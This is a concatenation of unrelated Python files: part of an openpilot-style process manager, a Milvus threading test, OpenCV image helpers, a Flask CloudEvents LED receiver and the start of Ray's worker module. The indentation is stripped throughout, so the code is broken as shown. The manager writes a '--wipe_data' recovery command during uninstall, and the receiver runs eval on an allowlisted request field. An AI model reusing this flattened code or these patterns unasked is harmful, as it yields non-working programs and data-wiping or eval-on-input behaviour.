# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoShutdown", "0"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightness", "0"),
("OpkrEnableDriverMonitoring", "1"),
("OpkrEnableLogger", "0"),
("OpkrEnableGetoffAlert", "1"),
("OpkrEnableLearner", "0"),
("OpkrAutoResume", "1"),
("OpkrAccelProfile", "0"),
("OpkrAutoLanechangedelay", "0"),
("OpkrRunMixplorer", "0"),
("OpkrRunQuickedit", "0"),
("OpkrRunSoftkey", "0"),
("OpkrRunNavigation", "0"),
("OpkrBootNavigation", "0"),
("PutPrebuiltOn", "0"),
("FingerprintIssuedFix", "0"),
("LdwsCarFix", "0"),
("LateralControlMethod", "0"),
("CruiseStatemodeSelInit", "0"),
("LateralControlPriority", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
test_thread.py
|
import concurrent.futures
import datetime
import random
import sys
import threading
import time
sys.path.append('.')
from factorys import time_it
from milvus import Milvus
dimension = 512
number = 100000
table_name = 'multi_task'
def add_vector_task(milvus, vector):
status, ids = milvus.insert(table_name=table_name, records=vector)
assert status.OK(), "add vectors failed"
assert len(ids) == len(vector)
@time_it
def thread_pool_add_vector(milvus, pool_size, vectors):
with concurrent.futures.ThreadPoolExecutor(max_workers=pool_size) as executor:
for _ in range(pool_size):
executor.submit(add_vector_task, milvus, vectors)
def test_run(gcon):
gmilvus = gcon
if gmilvus is None:
assert False, "Error occurred: connect failure"
status, exists = gmilvus.has_collection(table_name)
if exists:
gmilvus.drop_collection(table_name)
time.sleep(2)
table_param = {
'collection_name': table_name,
'dimension': dimension,
'index_file_size': 1024,
'metric_type': 1
}
gmilvus.create_collection(table_param)
for p in (1, 5, 10, 20, 40, 50, 100):
pool_size = p
step = number // pool_size
vectors = [[random.random() for _ in range(dimension)] for _ in range(step)]
thread_pool_add_vector(gmilvus, p, vectors)
time.sleep(1.5)
_, gcount = gmilvus.count_entities(table_name)
print(gcount)
def test_mult_insert(gcon):
def multi_thread_opr(client, collection_name, utid):
collection_param = {
'collection_name': collection_name,
'dimension': 64
}
vectors = [[random.random() for _ in range(64)] for _ in range(10000)]
status = client.create_collection(collection_param)
assert status.OK()
status, _ = client.insert(table_name, vectors)
assert status.OK()
thread_list = []
for i in range(10):
t = threading.Thread(target=multi_thread_opr, args=(gcon, "multi_table_{}".format(random.randint(0, 10000)), i))
t.start()
thread_list.append(t)
for tr in thread_list:
tr.join(timeout=None)
print("Done")
|
util.py
|
#
# Copyright (c) 2017, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
import sys
import cv2 as cv
import numpy as np
try:
import pyximport; pyximport.install()
except:
pass
# ==========================================
def subcopy(A, B, afrom, bfrom, bto):
afrom, bfrom, bto = map(np.asarray, [afrom, bfrom, bto])
shape = bto - bfrom
b = tuple(map(slice, bfrom, bto + 1))
a = tuple(map(slice, afrom, afrom + shape + 1))
B[b] = A[a]
def rgba2rgb(img):
if img.dtype == np.uint8 and len(img.shape) == 3: # convert rgba to rgb
w, h, *_ = img.shape
ret = np.zeros((w, h, 3), dtype=np.uint8)
for i in range(3): ret[:,:,i] = img[:,:,i]
img = ret
return img
def rgba2gray(img, conv=(0.21, 0.72, 0.07)):
if img.dtype == np.uint8 and len(img.shape) == 3: # convert rgba to gray
w, h, *_ = img.shape
ret = np.zeros((w, h), dtype=np.uint8)
for i in range(3): ret[:,:] = np.add(ret[:,:], np.multiply(img[:,:,i], conv[i]))
img = ret
return img
# ==========================================
def clahe(img, threshold=1.0):
""" Contrast Limited Adaptive Histogram Equalization (CLAHE) """
img = rgba2rgb(img)
b, g, r = cv.split(img) # split on blue, green and red channels
clahe = cv.createCLAHE(clipLimit=threshold, tileGridSize=(8, 8))
b2 = clahe.apply(b) # apply CLAHE to each channel
g2 = clahe.apply(g)
r2 = clahe.apply(r)
return cv.merge((b2, g2, r2)), # merge changed channels
def equalize(img):
""" Histogram Equalization """
img = rgba2rgb(img)
b, g, r = cv.split(img) # split on blue, green and red channels
b2 = cv.equalizeHist(b) # apply Histogram Equalization to each channel
g2 = cv.equalizeHist(g)
r2 = cv.equalizeHist(r)
return cv.merge((b2, g2, r2)), # merge equalized channels
# ==========================================
def static(img, threshold=0.01):
call = 'static_' + sys._getframe().f_back.f_code.co_name
h, w = img.shape
if not call in globals():
globals()[call] = np.zeros((h, w), dtype=img.dtype)
prev = globals()[call]
weights = img
temp = img * weights + prev * (1 - weights)
mask = np.where(temp > prev)
prev[mask] = temp[mask]
globals()[call] = prev
return prev,
def heal(img, history=5, threshold=0.05):
call = 'heal_' + sys._getframe().f_back.f_code.co_name
h, w = img.shape
if not call in globals():
globals()[call] = []
hist = globals()[call]
impro = np.zeros((h, w), dtype=img.dtype)
for i in range(len(hist)):
mask = np.where(np.logical_and(hist[i] > np.median(hist[i]) / 2, True))
impro[mask] = hist[i][mask]
hist.append(img)
if len(hist) > history:
hist.pop(0)
return impro,
def denoise(img, threshold=0.05):
h, w = img.shape
kernel_size = 5
kernel = np.ones((kernel_size, kernel_size), dtype=np.uint8)
impro = np.zeros((h, w), dtype=img.dtype)
maxed = cv.dilate(img, kernel, iterations=1)
idx = np.where(np.abs(maxed, img) > threshold)
impro[idx] = maxed[idx]
return impro,
def invert(img):
img = 1 - img
return img,
def stretch(img):
avg = np.average(img[img > 0]) # avg of non-black pixels
while abs(avg - 0.5) > 0.05: # avg is about 5 % off mid-gray?
d = (2 * avg) - 1
img = img * (1 - d)
avg = np.average(img[img > 0])
img[img > 1] = 1
img[img < 0] = 0
return img,
# ==========================================
def blur(img, size=0, cutoff=True):
h, w = img.shape
if size == 0:
k = len(np.where(img == 0.0)[0]) / ((h + w) / 2)
if k > 0:
s = min(int(k+1) * 3, 3)
return blur(img, s, cutoff)
n = int(np.sqrt(size))
convmat = np.ones((size, size), np.uint8) # equal-weighted convolution matrix
xn, yn = (size + size // 4) * n, (size + size // 8) * n
b = cv.dilate(img, convmat, iterations=n)
b = cv.resize(b, (w + xn, h + yn))
#b = cv.blur(img, (size, size))
#b = cv.GaussianBlur(img, (size, size), 0)
#b = cv.medianBlur(img, min(5, size - abs(size % 2 - 1)))
#b = cv.bilateralFilter(img, size, size * 2, size * 2)
if cutoff: b = b[yn // 2:-yn // 2, xn // 2:-xn // 2]
return b,
# ==========================================
def encircle(img, mask, minsize=10, color=(127, 127, 127)):
img = rgba2rgb(img)
cnts, hier = cv.findContours(mask, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
for i in range(len(cnts)):
cv.drawContours(mask, cnts, i, color, 2, cv.LINE_8, hier, 0)
if len(cnts) > 0:
c = max(cnts, key=cv.contourArea)
((x, y), radius) = cv.minEnclosingCircle(c)
cen = (int(x), int(y))
M = cv.moments(c)
cof = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
if radius > minsize:
cv.circle(img, cen, int(radius), color, 2)
cv.circle(img, cof, 2, color, -1)
return img, cof, cen, radius
return img, None, None, None
def trace(img, points, color, length=10, thick=1):
direction = [0, 0]
a, b = len(points), -1
for i in np.arange(1, len(points)):
if points[i-1] is None or points[i] is None: continue
if i < a: a = i
if i > b: b = i
th = int(np.sqrt(points.maxlen / float(i + 1)) * thick)
cv.line(img, points[i-1], points[i], color, th)
if a < b:
xn, yn = points[a]
xo, yo = points[b]
dx = xo - xn
dy = yo - yn
if np.abs(dx) > length // 2: direction[0] = -1 if np.sign(dx) == 1 else +1
if np.abs(dy) > length // 2: direction[1] = +1 if np.sign(dy) == 1 else -1
return img, tuple(direction)
# ==========================================
def sobel(img, threshold=192):
""" (Sobel of x) and (Sobel of y) """
img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
img[img > threshold] = 0
framex = cv.Sobel(img, cv.CV_8U, 1, 0)
datax = np.array(framex, dtype=np.uint8)
framey = cv.Sobel(img, cv.CV_8U, 0, 1)
datay = np.array(framey, dtype=np.uint8)
img = np.where((datax > datay), datax, datay)
img = np.asarray(img, dtype=np.uint8)
return img,
def masking(img, low=2, high=253):
""" masking by threshold (b/w) """
img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
lower = np.array(low)
upper = np.array(high)
mask = cv.inRange(img, lower, upper) # 1 = white, 0 = black
mask = img * mask
return mask,
# ==========================================
def laplacian(img, threshold=31, peaking=(255, 0, 0)):
""" Laplacian gradient filter """
img, gray = rgba2rgb(img), rgba2gray(img)
edges = cv.Laplacian(gray, cv.CV_8U)
img[edges > threshold] = peaking
return img, edges,
def canny(img, width=0.5, peaking=(255, 0, 0)):
""" adaptive Canny filter, edge detector """
#img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
#img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
img, gray = rgba2rgb(img), rgba2gray(img)
avg = np.average(gray) # or median
std = int(np.std(gray) * width)
lower = int(max(0, avg - std))
upper = int(min(255, avg + std))
edges = cv.Canny(gray, lower, upper, apertureSize=3)
img[edges == 255] = peaking
return img, edges,
def hough(img, min_length=5, peaking=(255, 0, 0)):
""" Hough transformation, corner detection """
_, edges, *_ = canny(img)
lines = cv.HoughLinesP(edges, 1, np.pi / 180, min_length)
mask = np.zeros(img.shape[:2], np.uint8)
if lines is not None:
for line in lines:
for x1, y1, x2, y2 in line:
p = ((x1+x2) // 2, (y1+y2) // 2)
x, y = p
cv.line(mask, (x, y), (x, y), 255, 2) # dot
img = rgba2rgb(img)
img[mask == 255] = peaking
return img, mask,
def harris(img, peaking=(255, 0, 0)):
""" Harris corner detection """
img, gray = rgba2rgb(img), rgba2gray(img)
dest = cv.cornerHarris(src=gray, blockSize=2, ksize=5, k=0.1)
dest = cv.dilate(dest, None)
img[dest > 0.01 * dest.max()] = peaking
return img, dest,
# ==========================================
def bgsub(img):
""" Background subtraction (i.e. motion detection) with given algorithm (e.g. Gaussian-Mixture model) """
call = 'fgbg_' + sys._getframe().f_back.f_code.co_name
if not call in globals():
globals()[call] = cv.bgsegm.createBackgroundSubtractorMOG(history=20, nmixtures=10, backgroundRatio=0.75, noiseSigma=0.0) # declare a global
fgbg = globals()[call]
img = rgba2rgb(img)
img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
mask = fgbg.apply(img)
return mask,
# def diff(img, history=5, threshold=0.05):
# call = 'heal_' + sys._getframe().f_back.f_code.co_name
# h, w = img.shape
# if not call in globals():
# globals()[call] = []
# hist = globals()[call]
# impro = np.zeros((h, w), dtype=img.dtype)
# for i in range(len(hist)):
# mask = np.where(np.logical_and(hist[i] > np.median(hist[i]) / 2, True))
# impro[mask] = hist[i][mask]
# hist.append(img)
# if len(hist) > history:
# hist.pop(0)
# return impro,
# def filter_sift(self):
# """ Scale-Invariant Feature Transform (SIFT). It is patented and not totally free """
# try:
# return self.get_features(cv2.xfeatures2d.SIFT_create())
# except cv2.error:
# return self.frame # return unchanged frame
# def filter_surf(self):
# """ Speeded-Up Robust Features (SURF). It is patented and not totally free """
# try:
# return self.get_features(cv2.xfeatures2d.SURF_create(4000))
# except cv2.error:
# return self.frame # return unchanged frame
# def filter_orb(self):
# """ Oriented FAST and Rotated BRIEF (ORB). It is not patented and totally free """
# return self.get_features(cv2.ORB_create())
# def filter_brief(self):
# """ BRIEF descriptors with the help of CenSurE (STAR) detector """
# gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) # convert to gray scale
# keypoints = cv2.xfeatures2d.StarDetector_create().detect(gray, None)
# keypoints, descriptor = cv2.xfeatures2d.BriefDescriptorExtractor_create().compute(gray, keypoints)
# return cv2.drawKeypoints(image=self.frame, outImage=self.frame, keypoints=keypoints,
# flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS, color=(51, 163, 236))
# def filter_optflow(self):
# """ Lucas Kanade optical flow """
# gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
# frame = self.frame.copy() # copy the frame
# if self.previous is None or self.previous.shape != gray.shape:
# self.previous = gray.copy() # save previous gray frame
# # Find new corner points of the frame
# self.opt_flow['points'] = cv2.goodFeaturesToTrack(
# gray, mask=None,
# **self.opt_flow['feature_params'])
# # Create a new mask image for drawing purposes
# self.opt_flow['mask'] = np.zeros_like(self.frame.copy())
# # If motion is large this method will fail. Ignore exceptions
# try:
# # Calculate optical flow. cv2.error could happen here.
# points, st, err = cv2.calcOpticalFlowPyrLK(
# self.previous, gray,
# self.opt_flow['points'], None, **self.opt_flow['lk_params'])
# # Select good points
# good_new = points[st == 1] # TypeError 'NoneType' could happen here
# good_old = self.opt_flow['points'][st == 1]
# # Draw the tracks
# for i, (new, old) in enumerate(zip(good_new, good_old)):
# a, b = new.ravel()
# c, d = old.ravel()
# # Draw lines in the mask
# self.opt_flow['mask'] = cv2.line(self.opt_flow['mask'], (a, b), (c, d),
# self.opt_flow['color'][i].tolist(), 2)
# # Draw circles in the frame
# frame = cv2.circle(frame, (a, b), 5, self.opt_flow['color'][i].tolist(), -1)
# # Update the previous frame and previous points
# self.previous = gray.copy()
# self.opt_flow['points'] = good_new.reshape(-1, 1, 2)
# return cv2.add(frame, self.opt_flow['mask']) # concatenate frame and mask images
# except (TypeError, cv2.error):
# self.previous = None # set optical flow to None if exception occurred
# return self.frame # return unchanged frame when error
# def filter_motion(self):
# """ Motion detection """
# if self.previous is None or self.previous.shape != self.frame.shape:
# self.previous = self.frame.copy() # remember previous frame
# return self.frame # return unchanged frame
# gray1 = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) # convert to grayscale
# gray2 = cv2.cvtColor(self.previous, cv2.COLOR_BGR2GRAY)
# self.previous = self.frame.copy() # remember previous frame
# return cv2.absdiff(gray1, gray2) # get absolute difference between two frames
# def filter_threshold(self):
# """ Adaptive Gaussian threshold """
# gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) # convert to gray scale
# return cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
# ==========================================
import os, threading
class PipeCapture:
ESC = b'\x1b' # 27
def __init__(self, stream, isthread=True):
self._stream = stream
self._isthread = isthread
self._descriptor = self._stream.fileno()
self._pipe_out, self._pipe_in = os.pipe()
self._worker = None
self._descriptor_dub = None
self._publish = None
self._buffer = []
def open(self, publish):
self._publish = publish
self._descriptor_dub = os.dup(self._descriptor)
os.dup2(self._pipe_in, self._descriptor)
if self._isthread:
self._worker = threading.Thread(target=self.read)
self._worker.start()
def close(self):
if self._publish is None: return
self._publish = None
self._stream.write(PipeCapture.ESC.decode('utf-8'))
self._stream.flush()
if self._isthread:
self._worker.join()
os.close(self._pipe_out)
os.dup2(self._descriptor_dub, self._descriptor)
def read(self):
while self._publish is not None:
char = os.read(self._pipe_out, 1)
if char == PipeCapture.ESC: break
self._buffer.append(char.decode('utf-8'))
if self._buffer[-1] == '\n':
self._publish(''.join(self._buffer))
self._buffer.clear()
|
cloudevents-receiver.py
|
#!/usr/bin/env python3
# copy to /usr/local/bin/cloudevents-receiver and use with cloudevents.service
import blinkt
import colorsys
import json
import random
import threading
import time
from flask import Flask, request
from cloudevents.http import from_http
app = Flask(__name__)
stop = threading.Event()
lock = threading.Lock()
activeThread = threading.Thread(name="default", target=(), args=(lock,stop,))
actions = [
'blink',
'brighten',
'clear',
'darken',
'rainbow',
'status'
]
brightness = 0.1
blinkt.set_brightness(brightness)
blinkt.set_clear_on_exit()
blinkt.clear()
blinkt.show()
@app.route("/", methods=["POST"])
def home():
event = from_http(request.headers, request.get_data())
if event['type'] == 'dev.pulsifer.blinky.request':
action = event.data['action']
if action in actions:
global activeThread
if action == 'blink':
stop_running_thread()
activeThread = threading.Thread(name="blink", target=blink, args=(lock,stop,))
activeThread.start()
elif action == 'rainbow':
stop_running_thread()
activeThread = threading.Thread(name="rainbow", target=rainbow, args=(lock,stop,))
activeThread.start()
else: eval(action)()
return json.dumps({
'action': activeThread.getName(),
'alive': activeThread.is_alive(),
'brightness': brightness,
})
return "", 501
return "", 400
def stop_running_thread():
if activeThread.isAlive():
stop.set()
activeThread.join()
stop.clear()
def brighten():
global brightness
if brightness < 1: brightness += 0.1
if brightness > 1: brightness = 1
blinkt.set_brightness(brightness)
blinkt.show()
def darken():
global brightness
if brightness > 0.1: brightness -= 0.1
if brightness < 0.1: brightness = 0.1
blinkt.set_brightness(brightness)
blinkt.show()
def clear():
stop_running_thread()
blinkt.clear()
blinkt.show()
def status():
pass
def blink(lock, stop):
with lock:
while not stop.is_set():
for i in range(blinkt.NUM_PIXELS):
blinkt.set_pixel(i, random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
blinkt.show()
time.sleep(0.1)
blinkt.clear()
def rainbow(lock, stop):
spacing = 360.0 / 16.0
with lock:
while not stop.is_set():
hue = int(time.time() * 100) % 360
for x in range(blinkt.NUM_PIXELS):
offset = x * spacing
h = ((hue + offset) % 360) / 360.0
r, g, b = [int(c * 255) for c in colorsys.hsv_to_rgb(h, 1.0, 1.0)]
blinkt.set_pixel(x, r, g, b)
blinkt.show()
time.sleep(0.001)
blinkt.clear()
if __name__ == "__main__":
app.run(port=3000, host="0.0.0.0")
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.runtime_env.py_modules import upload_py_modules_if_needed
from ray._private.runtime_env.working_dir import upload_working_dir_if_needed
from ray._private.runtime_env.constants import RAY_JOB_CONFIG_JSON_ENV_VAR
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized, _initialize_internal_kv, \
_internal_kv_reset
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return self.core_worker.get_current_runtime_env()
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address),
# If the owner address is set, then the initial reference is
# already acquired internally in CoreWorker::CreateOwned.
# TODO(ekl) we should unify the code path more with the others
# to avoid this special case.
skip_adding_local_ref=(owner_address is not None))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
